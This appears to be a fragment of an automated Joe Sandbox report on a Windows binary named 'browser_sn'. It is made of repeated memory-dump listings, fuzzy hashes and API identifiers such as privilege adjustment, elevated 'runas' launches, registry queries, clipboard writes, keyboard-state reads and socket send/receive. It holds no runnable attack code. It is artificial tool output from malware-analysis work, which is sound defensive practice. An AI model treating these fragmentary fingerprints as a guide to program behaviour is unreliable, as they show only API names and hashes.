                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$FindFirstModuleName
                                                                            • String ID: *.dsm
                                                                            • API String ID: 1519589655-1970359449
                                                                            • Opcode ID: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                            • Instruction ID: b0ad8af053722765d9ac69283dabc0b502d8410907f8659c36eda5298b18a3ca
                                                                            • Opcode Fuzzy Hash: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                            • Instruction Fuzzy Hash: 7131502560868681EBA0CF24A9842AA73A0FB497B9F405732DEBD837D4DE7CD509C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$FileModuleNameQueryValue
                                                                            • String ID: UseRegistry$admin$admin_auth
                                                                            • API String ID: 1028385882-3376419731
                                                                            • Opcode ID: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                            • Instruction ID: dd6561f2945277ab20cbe128bc0b65bce145958d744fad82916315efea8ab53f
                                                                            • Opcode Fuzzy Hash: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                            • Instruction Fuzzy Hash: A1213D31618A82D1EA90CF11E8846AA73B0FB89789F801135EE8E83B58CF7DE545CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 1314775590-3733053543
                                                                            • Opcode ID: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
                                                                            • Instruction ID: 4b6851d77b2f7cae8d8d71df0a08a9c796e13ac0a523745ba51886e76ac20d47
                                                                            • Opcode Fuzzy Hash: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
                                                                            • Instruction Fuzzy Hash: D9018471A18A4282EB90DF20F8452AA73B0FF89749F445435EE8E87754DFBDD058C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$FileModuleNamePrivateProfile
                                                                            • String ID: UseRegistry$admin
                                                                            • API String ID: 3032973919-2802730080
                                                                            • Opcode ID: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                            • Instruction ID: 2ae526b2a015504bbd1639bdfa0568b9ff6f38d5fcfac439fc68e7f3837129f0
                                                                            • Opcode Fuzzy Hash: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                            • Instruction Fuzzy Hash: 0001C835E1995281FEA1DF51E8647F52360FF99B5EF800572CE8EC2B64CEACE1449610
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: -securityeditor$p$runas
                                                                            • API String ID: 3648085421-1380712588
                                                                            • Opcode ID: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
                                                                            • Instruction ID: bfe5b7a7c28ed6bfa83c9e393d3ae933d060e362f4628f5b10de3a7d36df3e31
                                                                            • Opcode Fuzzy Hash: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
                                                                            • Instruction Fuzzy Hash: 2201C835619B8185E7A09F10F4943AAB3B4FB88749F900236DACD42B58DFBDD118CB40
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _get_daylight$CurrentProcess__tzset_errno_isindst
                                                                            • String ID:
                                                                            • API String ID: 1870958493-0
                                                                            • Opcode ID: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
                                                                            • Instruction ID: 34517566d2e59035b74855c033ea08734b5223fc88dd05462f66d2f9c6840b6c
                                                                            • Opcode Fuzzy Hash: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
                                                                            • Instruction Fuzzy Hash: 55712332F041024BF7688F249D916B966A6BBA434EF648235EF49C6BD9DF79A9018600
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                            • String ID:
                                                                            • API String ID: 1239891234-0
                                                                            • Opcode ID: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                            • Instruction ID: b74ad5f25e434f7862166f11bd457772bfba5be136ff8b24480f813c0bc29ff0
                                                                            • Opcode Fuzzy Hash: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                            • Instruction Fuzzy Hash: 61311C32618B8286DBA0DF25E8406AA73B4FB88759F500135EF9D83B99DFBCD545CB40
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlock
                                                                            • String ID:
                                                                            • API String ID: 2715784024-0
                                                                            • Opcode ID: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
                                                                            • Instruction ID: 3d31a74f778adaebb0586edd6351550780541e5e539beaa7159cf2ed72bfdbfc
                                                                            • Opcode Fuzzy Hash: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
                                                                            • Instruction Fuzzy Hash: 37019210B28A4282FA84CF25685827572A1EF46BEEF0C1134DEAE877C0DF6CE044C650
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2B8D390: GetModuleFileNameA.KERNEL32 ref: 00007FF6C2B8D3BB
                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7C09
                                                                              • Part of subcall function 00007FF6C2BD7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7689
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD76DD
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD7722
                                                                              • Part of subcall function 00007FF6C2BD78E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD792E
                                                                              • Part of subcall function 00007FF6C2BD78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6C2BD796A
                                                                              • Part of subcall function 00007FF6C2BD78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6C2BD79B2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                            • String ID: UseRegistry$admin$group1
                                                                            • API String ID: 1728753321-252764636
                                                                            • Opcode ID: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
                                                                            • Instruction ID: e6fab9345e1b714464144886b1965797dc737465c0023fb93c7a6035ac499f95
                                                                            • Opcode Fuzzy Hash: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
                                                                            • Instruction Fuzzy Hash: 64110035A1858291EAA0AF21E4913F92361FF9934EFD40431DE8DC6766DEBDE114D700
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2B8D390: GetModuleFileNameA.KERNEL32 ref: 00007FF6C2B8D3BB
                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7CC9
                                                                              • Part of subcall function 00007FF6C2BD7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7689
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD76DD
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD7722
                                                                              • Part of subcall function 00007FF6C2BD78E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD792E
                                                                              • Part of subcall function 00007FF6C2BD78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6C2BD796A
                                                                              • Part of subcall function 00007FF6C2BD78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6C2BD79B2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                            • String ID: UseRegistry$admin$group2
                                                                            • API String ID: 1728753321-2518265958
                                                                            • Opcode ID: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
                                                                            • Instruction ID: 6702ff3131b5e044c6cdd5ba2986091f35d80d15c8d626b5bb0fbc2d916adff6
                                                                            • Opcode Fuzzy Hash: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
                                                                            • Instruction Fuzzy Hash: F1110C35A1858291EAA0AF21E4A13F96360FF9934DFC40432DECDC67AADEBDE115D700
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2B8D390: GetModuleFileNameA.KERNEL32 ref: 00007FF6C2B8D3BB
                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7F8D
                                                                              • Part of subcall function 00007FF6C2BD7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7689
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD76DD
                                                                              • Part of subcall function 00007FF6C2BD7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6C2BD7722
                                                                              • Part of subcall function 00007FF6C2BD77F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6C2BD7840
                                                                              • Part of subcall function 00007FF6C2BD77F0: RegQueryValueExA.ADVAPI32 ref: 00007FF6C2BD787D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                            • String ID: UseRegistry$admin$locdom3
                                                                            • API String ID: 1788981264-1943432916
                                                                            • Opcode ID: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                            • Instruction ID: 491b67d34d693a6d895b8a49d7e48187aed07d1b974e051b7b7bbcfe96f74e13
                                                                            • Opcode Fuzzy Hash: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                            • Instruction Fuzzy Hash: 56015E24A1858391FA60DF31A4913F563A1EF9930EFC00432DECDC679ADEBCE148D600
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFindMode$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2885216544-0
                                                                            • Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                            • Instruction ID: ff17b01cf8a0db96c1690e99da0d71976c0cab4dda08e47ee17118cf167becc0
                                                                            • Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                            • Instruction Fuzzy Hash: AF010035A0878586DA608F21B4542A973A1FB4DBE5F404231DEAD83794DE7DD8459B40
                                                                            APIs
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recvsend
                                                                            • String ID:
                                                                            • API String ID: 740075404-0
                                                                            • Opcode ID: 18c2c4f1f16459f623e6aed15e8c4918751a6ada723bebe609739826a73a5893
                                                                            • Instruction ID: 2170e2b297d74c998a4bd98364f3934f78e8b86c2f2f4df8e0872fd1c5578e38
                                                                            • Opcode Fuzzy Hash: 18c2c4f1f16459f623e6aed15e8c4918751a6ada723bebe609739826a73a5893
                                                                            • Instruction Fuzzy Hash: 8341F77260878245D7754B74B5007B97AA0EB4ABADF5C4336DEED83BC6CE6CD1458700
                                                                            APIs
                                                                            • GetKeyboardState.USER32 ref: 00007FF6C2BA31D3
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B97509
                                                                              • Part of subcall function 00007FF6C2B974C0: GetKeyState.USER32 ref: 00007FF6C2B97523
